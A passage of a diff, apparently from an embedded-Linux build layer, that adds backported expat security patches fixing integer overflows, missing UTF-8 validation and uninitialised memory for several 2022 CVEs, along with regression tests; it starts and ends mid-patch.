18index b47c31b0..8f243126 100644
19--- a/lib/xmlparse.c
20+++ b/lib/xmlparse.c
21@@ -5046,6 +5046,11 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
22 if (parser->m_prologState.level >= parser->m_groupSize) {
23 if (parser->m_groupSize) {
24 {
25+ /* Detect and prevent integer overflow */
26+ if (parser->m_groupSize > (unsigned int)(-1) / 2u) {
27+ return XML_ERROR_NO_MEMORY;
28+ }
29+
30 char *const new_connector = (char *)REALLOC(
31 parser, parser->m_groupConnector, parser->m_groupSize *= 2);
32 if (new_connector == NULL) {
33@@ -5056,6 +5061,16 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
34 }
35
36 if (dtd->scaffIndex) {
37+ /* Detect and prevent integer overflow.
38+ * The preprocessor guard addresses the "always false" warning
39+ * from -Wtype-limits on platforms where
40+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
41+#if UINT_MAX >= SIZE_MAX
42+ if (parser->m_groupSize > (size_t)(-1) / sizeof(int)) {
43+ return XML_ERROR_NO_MEMORY;
44+ }
45+#endif
46+
47 int *const new_scaff_index = (int *)REALLOC(
48 parser, dtd->scaffIndex, parser->m_groupSize * sizeof(int));
49 if (new_scaff_index == NULL)
diff --git a/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch b/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
new file mode 100644
index 0000000000..e569fbc7ab
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
@@ -0,0 +1,257 @@
1From 9f93e8036e842329863bf20395b8fb8f73834d9e Mon Sep 17 00:00:00 2001
2From: Sebastian Pipping <sebastian@pipping.org>
3Date: Thu, 30 Dec 2021 22:46:03 +0100
4Subject: [PATCH] lib: Prevent integer overflow at multiple places
5 (CVE-2022-22822 to CVE-2022-22827)
6
7The involved functions are:
8- addBinding (CVE-2022-22822)
9- build_model (CVE-2022-22823)
10- defineAttribute (CVE-2022-22824)
11- lookup (CVE-2022-22825)
12- nextScaffoldPart (CVE-2022-22826)
13- storeAtts (CVE-2022-22827)
14
15Upstream-Status: Backport:
16https://github.com/libexpat/libexpat/pull/539/commits/9f93e8036e842329863bf20395b8fb8f73834d9e
17
18CVE: CVE-2022-22822 CVE-2022-22823 CVE-2022-22824 CVE-2022-22825 CVE-2022-22826 CVE-2022-22827
19Signed-off-by: Steve Sakoman <steve@sakoman.com>
20
21---
22 expat/lib/xmlparse.c | 153 ++++++++++++++++++++++++++++++++++++++++++-
23 1 file changed, 151 insertions(+), 2 deletions(-)
24
25diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
26index 8f243126..575e73ee 100644
27--- a/lib/xmlparse.c
28+++ b/lib/xmlparse.c
29@@ -3261,13 +3261,38 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
30
31 /* get the attributes from the tokenizer */
32 n = XmlGetAttributes(enc, attStr, parser->m_attsSize, parser->m_atts);
33+
34+ /* Detect and prevent integer overflow */
35+ if (n > INT_MAX - nDefaultAtts) {
36+ return XML_ERROR_NO_MEMORY;
37+ }
38+
39 if (n + nDefaultAtts > parser->m_attsSize) {
40 int oldAttsSize = parser->m_attsSize;
41 ATTRIBUTE *temp;
42 #ifdef XML_ATTR_INFO
43 XML_AttrInfo *temp2;
44 #endif
45+
46+ /* Detect and prevent integer overflow */
47+ if ((nDefaultAtts > INT_MAX - INIT_ATTS_SIZE)
48+ || (n > INT_MAX - (nDefaultAtts + INIT_ATTS_SIZE))) {
49+ return XML_ERROR_NO_MEMORY;
50+ }
51+
52 parser->m_attsSize = n + nDefaultAtts + INIT_ATTS_SIZE;
53+
54+ /* Detect and prevent integer overflow.
55+ * The preprocessor guard addresses the "always false" warning
56+ * from -Wtype-limits on platforms where
57+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
58+#if UINT_MAX >= SIZE_MAX
59+ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(ATTRIBUTE)) {
60+ parser->m_attsSize = oldAttsSize;
61+ return XML_ERROR_NO_MEMORY;
62+ }
63+#endif
64+
65 temp = (ATTRIBUTE *)REALLOC(parser, (void *)parser->m_atts,
66 parser->m_attsSize * sizeof(ATTRIBUTE));
67 if (temp == NULL) {
68@@ -3276,6 +3301,17 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
69 }
70 parser->m_atts = temp;
71 #ifdef XML_ATTR_INFO
72+ /* Detect and prevent integer overflow.
73+ * The preprocessor guard addresses the "always false" warning
74+ * from -Wtype-limits on platforms where
75+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
76+# if UINT_MAX >= SIZE_MAX
77+ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(XML_AttrInfo)) {
78+ parser->m_attsSize = oldAttsSize;
79+ return XML_ERROR_NO_MEMORY;
80+ }
81+# endif
82+
83 temp2 = (XML_AttrInfo *)REALLOC(parser, (void *)parser->m_attInfo,
84 parser->m_attsSize * sizeof(XML_AttrInfo));
85 if (temp2 == NULL) {
86@@ -3610,9 +3646,31 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
87 tagNamePtr->prefixLen = prefixLen;
88 for (i = 0; localPart[i++];)
89 ; /* i includes null terminator */
90+
91+ /* Detect and prevent integer overflow */
92+ if (binding->uriLen > INT_MAX - prefixLen
93+ || i > INT_MAX - (binding->uriLen + prefixLen)) {
94+ return XML_ERROR_NO_MEMORY;
95+ }
96+
97 n = i + binding->uriLen + prefixLen;
98 if (n > binding->uriAlloc) {
99 TAG *p;
100+
101+ /* Detect and prevent integer overflow */
102+ if (n > INT_MAX - EXPAND_SPARE) {
103+ return XML_ERROR_NO_MEMORY;
104+ }
105+ /* Detect and prevent integer overflow.
106+ * The preprocessor guard addresses the "always false" warning
107+ * from -Wtype-limits on platforms where
108+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
109+#if UINT_MAX >= SIZE_MAX
110+ if ((unsigned)(n + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
111+ return XML_ERROR_NO_MEMORY;
112+ }
113+#endif
114+
115 uri = (XML_Char *)MALLOC(parser, (n + EXPAND_SPARE) * sizeof(XML_Char));
116 if (! uri)
117 return XML_ERROR_NO_MEMORY;
118@@ -3708,6 +3766,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
119 if (parser->m_freeBindingList) {
120 b = parser->m_freeBindingList;
121 if (len > b->uriAlloc) {
122+ /* Detect and prevent integer overflow */
123+ if (len > INT_MAX - EXPAND_SPARE) {
124+ return XML_ERROR_NO_MEMORY;
125+ }
126+
127+ /* Detect and prevent integer overflow.
128+ * The preprocessor guard addresses the "always false" warning
129+ * from -Wtype-limits on platforms where
130+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
131+#if UINT_MAX >= SIZE_MAX
132+ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
133+ return XML_ERROR_NO_MEMORY;
134+ }
135+#endif
136+
137 XML_Char *temp = (XML_Char *)REALLOC(
138 parser, b->uri, sizeof(XML_Char) * (len + EXPAND_SPARE));
139 if (temp == NULL)
140@@ -3720,6 +3793,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
141 b = (BINDING *)MALLOC(parser, sizeof(BINDING));
142 if (! b)
143 return XML_ERROR_NO_MEMORY;
144+
145+ /* Detect and prevent integer overflow */
146+ if (len > INT_MAX - EXPAND_SPARE) {
147+ return XML_ERROR_NO_MEMORY;
148+ }
149+ /* Detect and prevent integer overflow.
150+ * The preprocessor guard addresses the "always false" warning
151+ * from -Wtype-limits on platforms where
152+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
153+#if UINT_MAX >= SIZE_MAX
154+ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
155+ return XML_ERROR_NO_MEMORY;
156+ }
157+#endif
158+
159 b->uri
160 = (XML_Char *)MALLOC(parser, sizeof(XML_Char) * (len + EXPAND_SPARE));
161 if (! b->uri) {
162@@ -6141,7 +6229,24 @@ defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *attId, XML_Bool isCdata,
163 }
164 } else {
165 DEFAULT_ATTRIBUTE *temp;
166+
167+ /* Detect and prevent integer overflow */
168+ if (type->allocDefaultAtts > INT_MAX / 2) {
169+ return 0;
170+ }
171+
172 int count = type->allocDefaultAtts * 2;
173+
174+ /* Detect and prevent integer overflow.
175+ * The preprocessor guard addresses the "always false" warning
176+ * from -Wtype-limits on platforms where
177+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
178+#if UINT_MAX >= SIZE_MAX
179+ if ((unsigned)count > (size_t)(-1) / sizeof(DEFAULT_ATTRIBUTE)) {
180+ return 0;
181+ }
182+#endif
183+
184 temp = (DEFAULT_ATTRIBUTE *)REALLOC(parser, type->defaultAtts,
185 (count * sizeof(DEFAULT_ATTRIBUTE)));
186 if (temp == NULL)
187@@ -6792,8 +6897,20 @@ lookup(XML_Parser parser, HASH_TABLE *table, KEY name, size_t createSize) {
188 /* check for overflow (table is half full) */
189 if (table->used >> (table->power - 1)) {
190 unsigned char newPower = table->power + 1;
191+
192+ /* Detect and prevent invalid shift */
193+ if (newPower >= sizeof(unsigned long) * 8 /* bits per byte */) {
194+ return NULL;
195+ }
196+
197 size_t newSize = (size_t)1 << newPower;
198 unsigned long newMask = (unsigned long)newSize - 1;
199+
200+ /* Detect and prevent integer overflow */
201+ if (newSize > (size_t)(-1) / sizeof(NAMED *)) {
202+ return NULL;
203+ }
204+
205 size_t tsize = newSize * sizeof(NAMED *);
206 NAMED **newV = (NAMED **)table->mem->malloc_fcn(tsize);
207 if (! newV)
208@@ -7143,6 +7260,20 @@ nextScaffoldPart(XML_Parser parser) {
209 if (dtd->scaffCount >= dtd->scaffSize) {
210 CONTENT_SCAFFOLD *temp;
211 if (dtd->scaffold) {
212+ /* Detect and prevent integer overflow */
213+ if (dtd->scaffSize > UINT_MAX / 2u) {
214+ return -1;
215+ }
216+ /* Detect and prevent integer overflow.
217+ * The preprocessor guard addresses the "always false" warning
218+ * from -Wtype-limits on platforms where
219+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
220+#if UINT_MAX >= SIZE_MAX
221+ if (dtd->scaffSize > (size_t)(-1) / 2u / sizeof(CONTENT_SCAFFOLD)) {
222+ return -1;
223+ }
224+#endif
225+
226 temp = (CONTENT_SCAFFOLD *)REALLOC(
227 parser, dtd->scaffold, dtd->scaffSize * 2 * sizeof(CONTENT_SCAFFOLD));
228 if (temp == NULL)
229@@ -7212,8 +7343,26 @@ build_model(XML_Parser parser) {
230 XML_Content *ret;
231 XML_Content *cpos;
232 XML_Char *str;
233- int allocsize = (dtd->scaffCount * sizeof(XML_Content)
234- + (dtd->contentStringLen * sizeof(XML_Char)));
235+
236+ /* Detect and prevent integer overflow.
237+ * The preprocessor guard addresses the "always false" warning
238+ * from -Wtype-limits on platforms where
239+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
240+#if UINT_MAX >= SIZE_MAX
241+ if (dtd->scaffCount > (size_t)(-1) / sizeof(XML_Content)) {
242+ return NULL;
243+ }
244+ if (dtd->contentStringLen > (size_t)(-1) / sizeof(XML_Char)) {
245+ return NULL;
246+ }
247+#endif
248+ if (dtd->scaffCount * sizeof(XML_Content)
249+ > (size_t)(-1) - dtd->contentStringLen * sizeof(XML_Char)) {
250+ return NULL;
251+ }
252+
253+ const size_t allocsize = (dtd->scaffCount * sizeof(XML_Content)
254+ + (dtd->contentStringLen * sizeof(XML_Char)));
255
256 ret = (XML_Content *)MALLOC(parser, allocsize);
257 if (! ret)
diff --git a/meta/recipes-core/expat/expat/CVE-2022-23852.patch b/meta/recipes-core/expat/expat/CVE-2022-23852.patch
new file mode 100644
index 0000000000..41425c108b
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23852.patch
@@ -0,0 +1,33 @@
1From 847a645152f5ebc10ac63b74b604d0c1a79fae40 Mon Sep 17 00:00:00 2001
2From: Samanta Navarro <ferivoz@riseup.net>
3Date: Sat, 22 Jan 2022 17:48:00 +0100
4Subject: [PATCH] lib: Detect and prevent integer overflow in XML_GetBuffer
5 (CVE-2022-23852)
6
7Upstream-Status: Backport:
8https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40
9
10CVE: CVE-2022-23852
11
12Signed-off-by: Steve Sakoman <steve@sakoman.com>
13
14---
15 expat/lib/xmlparse.c | 5 +++++
16 1 file changed, 5 insertions(+)
17
18diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
19index d54af683..5ce31402 100644
20--- a/lib/xmlparse.c
21+++ b/lib/xmlparse.c
22@@ -2067,6 +2067,11 @@ XML_GetBuffer(XML_Parser parser, int len) {
23 keep = (int)EXPAT_SAFE_PTR_DIFF(parser->m_bufferPtr, parser->m_buffer);
24 if (keep > XML_CONTEXT_BYTES)
25 keep = XML_CONTEXT_BYTES;
26+ /* Detect and prevent integer overflow */
27+ if (keep > INT_MAX - neededSize) {
28+ parser->m_errorCode = XML_ERROR_NO_MEMORY;
29+ return NULL;
30+ }
31 neededSize += keep;
32 #endif /* defined XML_CONTEXT_BYTES */
33 if (neededSize
diff --git a/meta/recipes-core/expat/expat/CVE-2022-23990.patch b/meta/recipes-core/expat/expat/CVE-2022-23990.patch
new file mode 100644
index 0000000000..c599517b3e
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23990.patch
@@ -0,0 +1,49 @@
1From ede41d1e186ed2aba88a06e84cac839b770af3a1 Mon Sep 17 00:00:00 2001
2From: Sebastian Pipping <sebastian@pipping.org>
3Date: Wed, 26 Jan 2022 02:36:43 +0100
4Subject: [PATCH] lib: Prevent integer overflow in doProlog (CVE-2022-23990)
5
6The change from "int nameLen" to "size_t nameLen"
7addresses the overflow on "nameLen++" in code
8"for (; name[nameLen++];)" right above the second
9change in the patch.
10
11Upstream-Status: Backport:
12https://github.com/libexpat/libexpat/pull/551/commits/ede41d1e186ed2aba88a06e84cac839b770af3a1
13
14CVE: CVE-2022-23990
15
16Signed-off-by: Steve Sakoman <steve@sakoman.com>
17
18---
19 lib/xmlparse.c | 10 ++++++++--
20 1 file changed, 8 insertions(+), 2 deletions(-)
21
22diff --git a/lib/xmlparse.c b/expat/lib/xmlparse.c
23index 5ce31402..d1d17005 100644
24--- a/lib/xmlparse.c
25+++ b/lib/xmlparse.c
26@@ -5372,7 +5372,7 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
27 if (dtd->in_eldecl) {
28 ELEMENT_TYPE *el;
29 const XML_Char *name;
30- int nameLen;
31+ size_t nameLen;
32 const char *nxt
33 = (quant == XML_CQUANT_NONE ? next : next - enc->minBytesPerChar);
34 int myindex = nextScaffoldPart(parser);
35@@ -5388,7 +5388,13 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
36 nameLen = 0;
37 for (; name[nameLen++];)
38 ;
39- dtd->contentStringLen += nameLen;
40+
41+ /* Detect and prevent integer overflow */
42+ if (nameLen > UINT_MAX - dtd->contentStringLen) {
43+ return XML_ERROR_NO_MEMORY;
44+ }
45+
46+ dtd->contentStringLen += (unsigned)nameLen;
47 if (parser->m_elementDeclHandler)
48 handleDefault = XML_FALSE;
49 }
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25235.patch b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
new file mode 100644
index 0000000000..be9182a5c1
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
@@ -0,0 +1,283 @@
1From ee2a5b50e7d1940ba8745715b62ceb9efd3a96da Mon Sep 17 00:00:00 2001
2From: Sebastian Pipping <sebastian@pipping.org>
3Date: Tue, 8 Feb 2022 17:37:14 +0100
4Subject: [PATCH] lib: Drop unused macro UTF8_GET_NAMING
5
6Upstream-Status: Backport
7https://github.com/libexpat/libexpat/pull/562/commits
8
9CVE: CVE-2022-25235
10
11Signed-off-by: Steve Sakoman <steve@sakoman.com>
12
13---
14 expat/lib/xmltok.c | 5 -----
15 1 file changed, 5 deletions(-)
16
17diff --git a/lib/xmltok.c b/lib/xmltok.c
18index a72200e8..3bddf125 100644
19--- a/lib/xmltok.c
20+++ b/lib/xmltok.c
21@@ -95,11 +95,6 @@
22 + ((((byte)[1]) & 3) << 1) + ((((byte)[2]) >> 5) & 1)] \
23 & (1u << (((byte)[2]) & 0x1F)))
24
25-#define UTF8_GET_NAMING(pages, p, n) \
26- ((n) == 2 \
27- ? UTF8_GET_NAMING2(pages, (const unsigned char *)(p)) \
28- : ((n) == 3 ? UTF8_GET_NAMING3(pages, (const unsigned char *)(p)) : 0))
29-
30 /* Detection of invalid UTF-8 sequences is based on Table 3.1B
31 of Unicode 3.2: http://www.unicode.org/unicode/reports/tr28/
32 with the additional restriction of not allowing the Unicode
33From 3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 Mon Sep 17 00:00:00 2001
34From: Sebastian Pipping <sebastian@pipping.org>
35Date: Tue, 8 Feb 2022 04:32:20 +0100
36Subject: [PATCH] lib: Add missing validation of encoding (CVE-2022-25235)
37
38---
39 expat/lib/xmltok_impl.c | 8 ++++++--
40 1 file changed, 6 insertions(+), 2 deletions(-)
41
42diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
43index 0430591b4..64a3b2c15 100644
44--- a/lib/xmltok_impl.c
45+++ b/lib/xmltok_impl.c
46@@ -61,7 +61,7 @@
47 case BT_LEAD##n: \
48 if (end - ptr < n) \
49 return XML_TOK_PARTIAL_CHAR; \
50- if (! IS_NAME_CHAR(enc, ptr, n)) { \
51+ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NAME_CHAR(enc, ptr, n)) { \
52 *nextTokPtr = ptr; \
53 return XML_TOK_INVALID; \
54 } \
55@@ -90,7 +90,7 @@
56 case BT_LEAD##n: \
57 if (end - ptr < n) \
58 return XML_TOK_PARTIAL_CHAR; \
59- if (! IS_NMSTRT_CHAR(enc, ptr, n)) { \
60+ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NMSTRT_CHAR(enc, ptr, n)) { \
61 *nextTokPtr = ptr; \
62 return XML_TOK_INVALID; \
63 } \
64@@ -1134,6 +1134,10 @@ PREFIX(prologTok)(const ENCODING *enc, const char *ptr, const char *end,
65 case BT_LEAD##n: \
66 if (end - ptr < n) \
67 return XML_TOK_PARTIAL_CHAR; \
68+ if (IS_INVALID_CHAR(enc, ptr, n)) { \
69+ *nextTokPtr = ptr; \
70+ return XML_TOK_INVALID; \
71+ } \
72 if (IS_NMSTRT_CHAR(enc, ptr, n)) { \
73 ptr += n; \
74 tok = XML_TOK_NAME; \
75From c85a3025e7a1be086dc34e7559fbc543914d047f Mon Sep 17 00:00:00 2001
76From: Sebastian Pipping <sebastian@pipping.org>
77Date: Wed, 9 Feb 2022 01:00:38 +0100
78Subject: [PATCH] lib: Add comments to BT_LEAD* cases where encoding has
79 already been validated
80
81---
82 expat/lib/xmltok_impl.c | 10 +++++-----
83 1 file changed, 5 insertions(+), 5 deletions(-)
84
85diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
86index 64a3b2c1..84ff35f9 100644
87--- a/lib/xmltok_impl.c
88+++ b/lib/xmltok_impl.c
89@@ -1266,7 +1266,7 @@ PREFIX(attributeValueTok)(const ENCODING *enc, const char *ptr, const char *end,
90 switch (BYTE_TYPE(enc, ptr)) {
91 # define LEAD_CASE(n) \
92 case BT_LEAD##n: \
93- ptr += n; \
94+ ptr += n; /* NOTE: The encoding has already been validated. */ \
95 break;
96 LEAD_CASE(2)
97 LEAD_CASE(3)
98@@ -1335,7 +1335,7 @@ PREFIX(entityValueTok)(const ENCODING *enc, const char *ptr, const char *end,
99 switch (BYTE_TYPE(enc, ptr)) {
100 # define LEAD_CASE(n) \
101 case BT_LEAD##n: \
102- ptr += n; \
103+ ptr += n; /* NOTE: The encoding has already been validated. */ \
104 break;
105 LEAD_CASE(2)
106 LEAD_CASE(3)
107@@ -1514,7 +1514,7 @@ PREFIX(getAtts)(const ENCODING *enc, const char *ptr, int attsMax,
108 state = inName; \
109 }
110 # define LEAD_CASE(n) \
111- case BT_LEAD##n: \
112+ case BT_LEAD##n: /* NOTE: The encoding has already been validated. */ \
113 START_NAME ptr += (n - MINBPC(enc)); \
114 break;
115 LEAD_CASE(2)
116@@ -1726,7 +1726,7 @@ PREFIX(nameLength)(const ENCODING *enc, const char *ptr) {
117 switch (BYTE_TYPE(enc, ptr)) {
118 # define LEAD_CASE(n) \
119 case BT_LEAD##n: \
120- ptr += n; \
121+ ptr += n; /* NOTE: The encoding has already been validated. */ \
122 break;
123 LEAD_CASE(2)
124 LEAD_CASE(3)
125@@ -1771,7 +1771,7 @@ PREFIX(updatePosition)(const ENCODING *enc, const char *ptr, const char *end,
126 switch (BYTE_TYPE(enc, ptr)) {
127 # define LEAD_CASE(n) \
128 case BT_LEAD##n: \
129- ptr += n; \
130+ ptr += n; /* NOTE: The encoding has already been validated. */ \
131 break;
132 LEAD_CASE(2)
133 LEAD_CASE(3)
134From 6a5510bc6b7efe743356296724e0b38300f05379 Mon Sep 17 00:00:00 2001
135From: Sebastian Pipping <sebastian@pipping.org>
136Date: Tue, 8 Feb 2022 04:06:21 +0100
137Subject: [PATCH] tests: Cover missing validation of encoding (CVE-2022-25235)
138
139---
140 expat/tests/runtests.c | 109 +++++++++++++++++++++++++++++++++++++++++
141 1 file changed, 109 insertions(+)
142
143diff --git a/tests/runtests.c b/tests/runtests.c
144index bc5344b1..9b155b82 100644
145--- a/tests/runtests.c
146+++ b/tests/runtests.c
147@@ -5998,6 +5998,105 @@ START_TEST(test_utf8_in_cdata_section_2) {
148 }
149 END_TEST
150
151+START_TEST(test_utf8_in_start_tags) {
152+ struct test_case {
153+ bool goodName;
154+ bool goodNameStart;
155+ const char *tagName;
156+ };
157+
158+ // The idea with the tests below is this:
159+ // We want to cover 1-, 2- and 3-byte sequences, 4-byte sequences
160+ // go to isNever and are hence not a concern.
161+ //
162+ // We start with a character that is a valid name character
163+ // (or even name-start character, see XML 1.0r4 spec) and then we flip
164+ // single bits at places where (1) the result leaves the UTF-8 encoding space
165+ // and (2) we stay in the same n-byte sequence family.
166+ //
167+ // The flipped bits are highlighted in angle brackets in comments,
168+ // e.g. "[<1>011 1001]" means we had [0011 1001] but we now flipped
169+ // the most significant bit to 1 to leave UTF-8 encoding space.
170+ struct test_case cases[] = {
171+ // 1-byte UTF-8: [0xxx xxxx]
172+ {true, true, "\x3A"}, // [0011 1010] = ASCII colon ':'
173+ {false, false, "\xBA"}, // [<1>011 1010]
174+ {true, false, "\x39"}, // [0011 1001] = ASCII nine '9'
175+ {false, false, "\xB9"}, // [<1>011 1001]
176+
177+ // 2-byte UTF-8: [110x xxxx] [10xx xxxx]
178+ {true, true, "\xDB\xA5"}, // [1101 1011] [1010 0101] =
179+ // Arabic small waw U+06E5
180+ {false, false, "\x9B\xA5"}, // [1<0>01 1011] [1010 0101]
181+ {false, false, "\xDB\x25"}, // [1101 1011] [<0>010 0101]
182+ {false, false, "\xDB\xE5"}, // [1101 1011] [1<1>10 0101]
183+ {true, false, "\xCC\x81"}, // [1100 1100] [1000 0001] =
184+ // combining char U+0301
185+ {false, false, "\x8C\x81"}, // [1<0>00 1100] [1000 0001]
186+ {false, false, "\xCC\x01"}, // [1100 1100] [<0>000 0001]
187+ {false, false, "\xCC\xC1"}, // [1100 1100] [1<1>00 0001]
188+
189+ // 3-byte UTF-8: [1110 xxxx] [10xx xxxx] [10xxxxxx]
190+ {true, true, "\xE0\xA4\x85"}, // [1110 0000] [1010 0100] [1000 0101] =
191+ // Devanagari Letter A U+0905
192+ {false, false, "\xA0\xA4\x85"}, // [1<0>10 0000] [1010 0100] [1000 0101]
193+ {false, false, "\xE0\x24\x85"}, // [1110 0000] [<0>010 0100] [1000 0101]
194+ {false, false, "\xE0\xE4\x85"}, // [1110 0000] [1<1>10 0100] [1000 0101]
195+ {false, false, "\xE0\xA4\x05"}, // [1110 0000] [1010 0100] [<0>000 0101]
196+ {false, false, "\xE0\xA4\xC5"}, // [1110 0000] [1010 0100] [1<1>00 0101]
197+ {true, false, "\xE0\xA4\x81"}, // [1110 0000] [1010 0100] [1000 0001] =
198+ // combining char U+0901
199+ {false, false, "\xA0\xA4\x81"}, // [1<0>10 0000] [1010 0100] [1000 0001]
200+ {false, false, "\xE0\x24\x81"}, // [1110 0000] [<0>010 0100] [1000 0001]
201+ {false, false, "\xE0\xE4\x81"}, // [1110 0000] [1<1>10 0100] [1000 0001]
202+ {false, false, "\xE0\xA4\x01"}, // [1110 0000] [1010 0100] [<0>000 0001]
203+ {false, false, "\xE0\xA4\xC1"}, // [1110 0000] [1010 0100] [1<1>00 0001]
204+ };
205+ const bool atNameStart[] = {true, false};
206+
207+ size_t i = 0;
208+ char doc[1024];
209+ size_t failCount = 0;
210+
211+ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
212+ size_t j = 0;
213+ for (; j < sizeof(atNameStart) / sizeof(atNameStart[0]); j++) {
214+ const bool expectedSuccess
215+ = atNameStart[j] ? cases[i].goodNameStart : cases[i].goodName;
216+ sprintf(doc, "<%s%s><!--", atNameStart[j] ? "" : "a", cases[i].tagName);
217+ XML_Parser parser = XML_ParserCreate(NULL);
218+
219+ const enum XML_Status status
220+ = XML_Parse(parser, doc, (int)strlen(doc), /*isFinal=*/XML_FALSE);
221+
222+ bool success = true;
223+ if ((status == XML_STATUS_OK) != expectedSuccess) {
224+ success = false;
225+ }
226+ if ((status == XML_STATUS_ERROR)
227+ && (XML_GetErrorCode(parser) != XML_ERROR_INVALID_TOKEN)) {
228+ success = false;
229+ }
230+
231+ if (! success) {
232+ fprintf(
233+ stderr,
234+ "FAIL case %2u (%sat name start, %u-byte sequence, error code %d)\n",
235+ (unsigned)i + 1u, atNameStart[j] ? " " : "not ",
236+ (unsigned)strlen(cases[i].tagName), XML_GetErrorCode(parser));
237+ failCount++;
238+ }
239+
240+ XML_ParserFree(parser);
241+ }
242+ }
243+
244+ if (failCount > 0) {
245+ fail("UTF-8 regression detected");
246+ }
247+}
248+END_TEST
249+
250 /* Test trailing spaces in elements are accepted */
251 static void XMLCALL
252 record_element_end_handler(void *userData, const XML_Char *name) {
253@@ -6175,6 +6274,14 @@ START_TEST(test_bad_doctype) {
254 }
255 END_TEST
256
257+START_TEST(test_bad_doctype_utf8) {
258+ const char *text = "<!DOCTYPE \xDB\x25"
259+ "doc><doc/>"; // [1101 1011] [<0>010 0101]
260+ expect_failure(text, XML_ERROR_INVALID_TOKEN,
261+ "Invalid UTF-8 in DOCTYPE not faulted");
262+}
263+END_TEST
264+
265 START_TEST(test_bad_doctype_utf16) {
266 const char text[] =
267 /* <!DOCTYPE doc [ \x06f2 ]><doc/>
268@@ -11870,6 +11977,7 @@ make_suite(void) {
269 tcase_add_test(tc_basic, test_ext_entity_utf8_non_bom);
270 tcase_add_test(tc_basic, test_utf8_in_cdata_section);
271 tcase_add_test(tc_basic, test_utf8_in_cdata_section_2);
272+ tcase_add_test(tc_basic, test_utf8_in_start_tags);
273 tcase_add_test(tc_basic, test_trailing_spaces_in_elements);
274 tcase_add_test(tc_basic, test_utf16_attribute);
275 tcase_add_test(tc_basic, test_utf16_second_attr);
276@@ -11878,6 +11986,7 @@ make_suite(void) {
277 tcase_add_test(tc_basic, test_bad_attr_desc_keyword);
278 tcase_add_test(tc_basic, test_bad_attr_desc_keyword_utf16);
279 tcase_add_test(tc_basic, test_bad_doctype);
280+ tcase_add_test(tc_basic, test_bad_doctype_utf8);
281 tcase_add_test(tc_basic, test_bad_doctype_utf16);
282 tcase_add_test(tc_basic, test_bad_doctype_plus);
283 tcase_add_test(tc_basic, test_bad_doctype_star);
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25236.patch b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
new file mode 100644
index 0000000000..ba6443fc6a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
@@ -0,0 +1,129 @@
1From 6881a4fc8596307ab9ff2e85e605afa2e413ab71 Mon Sep 17 00:00:00 2001
2From: Sebastian Pipping <sebastian@pipping.org>
3Date: Sat, 12 Feb 2022 00:19:13 +0100
4Subject: [PATCH] lib: Fix (harmless) use of uninitialized memory
5
6Upstream-Status: Backport
7https://github.com/libexpat/libexpat/pull/561/commits
8
9CVE: CVE-2022-25236
10
11Signed-off-by: Steve Sakoman <steve@sakoman.com>
12
13---
14 expat/lib/xmlparse.c | 6 ++----
15 1 file changed, 2 insertions(+), 4 deletions(-)
16
17diff --git a/lib/xmlparse.c b/lib/xmlparse.c
18index 902895d5..c768f856 100644
19--- a/lib/xmlparse.c
20+++ b/lib/xmlparse.c
21@@ -718,8 +718,7 @@ XML_ParserCreate(const XML_Char *encodingName) {
22
23 XML_Parser XMLCALL
24 XML_ParserCreateNS(const XML_Char *encodingName, XML_Char nsSep) {
25- XML_Char tmp[2];
26- *tmp = nsSep;
27+ XML_Char tmp[2] = {nsSep, 0};
28 return XML_ParserCreate_MM(encodingName, NULL, tmp);
29 }
30
31@@ -1344,8 +1343,7 @@ XML_ExternalEntityParserCreate(XML_Parser oldParser, const XML_Char *context,
32 would be otherwise.
33 */
34 if (parser->m_ns) {
35- XML_Char tmp[2];
36- *tmp = parser->m_namespaceSeparator;
37+ XML_Char tmp[2] = {parser->m_namespaceSeparator, 0};
